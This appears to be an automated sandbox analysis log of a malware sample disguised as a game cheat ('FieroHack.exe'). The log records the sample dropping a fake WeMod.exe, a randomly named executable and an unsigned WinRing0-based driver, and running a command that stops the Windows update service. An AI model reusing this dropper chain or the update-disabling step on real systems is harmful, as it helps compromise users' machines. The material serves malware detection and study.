      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeSection loaded: apphelp.dll
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeSection loaded: windows.storage.dll
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeSection loaded: wldp.dll
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\choice.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\explorer.exeSection loaded: userenv.dll
      Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
      Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
      Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
      Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
      Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
      Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
      Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
      Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
      Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
      Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: amsi.dll
      Source: C:\Windows\explorer.exeSection loaded: profapi.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
      Source: C:\Users\user\Desktop\FieroHack.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: FieroHack.exeStatic file information: File size 6603296 > 1048576
      Source: FieroHack.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.dr
      Source: initial sampleStatic PE information: section where entry point is pointing to: .rsrc
      Source: WeMod.exe.0.drStatic PE information: section name: .pexe
      Source: leirdnhqqedj.exe.2.drStatic PE information: section name: .pexe
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEE15 push esi; iretd 2_2_0000021E477BEE58
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C44D3 push 158B4C11h; iretd 2_2_0000021E477C451D
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BF8B8 pushad ; iretd 2_2_0000021E477BF904
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C2D2E push ecx; retf 2_2_0000021E477C2D2F
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BF90E pushad ; iretd 2_2_0000021E477BF904
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C2B82 push ds; iretd 2_2_0000021E477C2B83
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477C0778 push ss; retf 2_2_0000021E477C0779
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEF75 push edx; retf 2_2_0000021E477BEFAA
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEF49 push edx; retf 2_2_0000021E477BEFAA
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEF13 push edx; retf 2_2_0000021E477BEF48
      Source: C:\Users\user\AppData\Roaming\WeMod.exeCode function: 2_2_0000021E477BEEE0 push edx; retf 2_2_0000021E477BEF48
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_0539C169 pushfd ; retf 7_2_0539C16B
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_0539AED0 pushfd ; retf 7_2_0539AEDE
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_05E13D0F pushfd ; retf 7_2_05E13D1E
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBB7C push es; retf 7_2_076DBB7F
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBB53 push ecx; retf 7_2_076DBB57
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBB3C push ebp; retf 7_2_076DBB3D
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBB04 push edx; retf 7_2_076DBB05
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA63 push edx; retf 7_2_076DBA64
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA7C push esi; retf 7_2_076DBA7D
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA46 push esi; retf 7_2_076DBA4A
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA2D push edx; retf 7_2_076DBA31
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBA16 push esi; retf 7_2_076DBA17
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBAD6 push ebp; retf 7_2_076DBAD7
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBAA1 push ebp; retf 7_2_076DBAAA
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBD33 push ebx; retf 7_2_076DBD37
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DB9E3 push esi; retf 7_2_076DB9E4
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DB9FD push ebx; retf 7_2_076DB9FE
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DB9CA push ebx; retf 7_2_076DB9CB
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBC4E push eax; retf 7_2_076DBC4F
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_076DBC5B push esp; retf 7_2_076DBC64

      Persistence and Installation Behavior

      barindex
      Creates files in the system32 config directory
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\Obsidium\{3D20819C-5D02B5C8-D5AE7FCB-C4F5C439}\6796.obs
      Sample is not signed and drops a device driver
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\TEMP\qkrjwvgkutvb.sys
      Source: C:\Users\user\AppData\Roaming\WeMod.exeFile created: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeJump to dropped file
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\Temp\qkrjwvgkutvb.sysJump to dropped file
      Source: C:\Users\user\Desktop\FieroHack.exeFile created: C:\Users\user\AppData\Roaming\WeMod.exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\WeMod.exeFile created: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeJump to dropped file
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile created: C:\Windows\Temp\qkrjwvgkutvb.sysJump to dropped file
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\Desktop\FieroHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
